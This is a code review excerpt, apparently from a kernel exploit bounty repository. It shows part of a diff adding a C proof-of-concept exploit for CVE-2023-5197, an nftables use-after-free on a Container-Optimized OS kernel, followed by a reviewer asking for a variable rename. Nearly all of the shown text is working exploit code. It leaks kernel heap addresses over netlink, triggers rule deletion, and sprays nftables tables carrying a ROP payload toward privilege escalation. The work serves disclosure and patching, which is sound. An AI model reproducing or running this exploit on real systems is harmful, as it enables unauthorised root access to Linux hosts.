pocs/linux/kernelctf/CVE-2023-5197_lts_cos/exploit/cos-105-17412.156.23/exploit.c

```diff
@@ -0,0 +1,834 @@
+
+    if (ret > 0) {
+        heap_addr1 = *(unsigned long*) &read_data[0x78];
+        heap_addr2 = *(unsigned long*) &read_data[0x70];
+        ret = mnl_socket_recvfrom(nl, read_data, 0x200);
+    }
+
+    printf("[*] heap_addr %lx %lx\n", heap_addr1, heap_addr2);
+
+    if((heap_addr1 & 0xffff000000000000) != 0xffff000000000000){
+        printf("[-] heap leak failed..\n");
+        return -1;
+    }
+
+    // Spray ROP payload
+    struct nftnl_rule * rule_del = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_del, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_del, NFTNL_RULE_CHAIN, chain1_name);
+    nftnl_rule_set_u64(rule_del, NFTNL_RULE_HANDLE, 0x13);
+
+    batch = mnl_nlmsg_batch_start(buf, buf_size);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, 0, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_del);
+    mnl_nlmsg_batch_next(batch);
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    // wait for destroy work
+    usleep(300*1000);
+
+    struct nftnl_table * tables[TABLE_SPRAY] = {0,};
+
+    uint64_t *data = malloc(1024);
+    memset(data, 'd', 1024);
+
+    make_payload(data);
+
+    for(int i = 0; i < TABLE_SPRAY; i++){
+        char *table_name;
+        asprintf(&table_name, "st96_%02hx", i);
+
+        struct nftnl_table * table = nftnl_table_alloc();
+        nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
+        nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);
+        nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, data, 96);
+
+        tables[i] = table;
+    }
+
+    batch = mnl_nlmsg_batch_start(buf, buf_size);
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    for(int i = 0; i < TABLE_SPRAY; i++){
+        nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, 0, seq++);
+        nftnl_table_nlmsg_build_payload(nlh, tables[i]);
+        mnl_nlmsg_batch_next(batch);
+    }
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    int o = 0;
+
+    data[o++] = heap_addr2;
+    data[o++] = 0;
+
+    for(int i = 0; i < TABLE_SPRAY; i++){
+        char *table_name;
+        asprintf(&table_name, "st64_%02hx", i);
+
+        struct nftnl_table * table = nftnl_table_alloc();
+        nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
+        nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);
+        nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, data, 64);
```

Comment:
Could you rename the data variable to specify which type of object is being sprayed?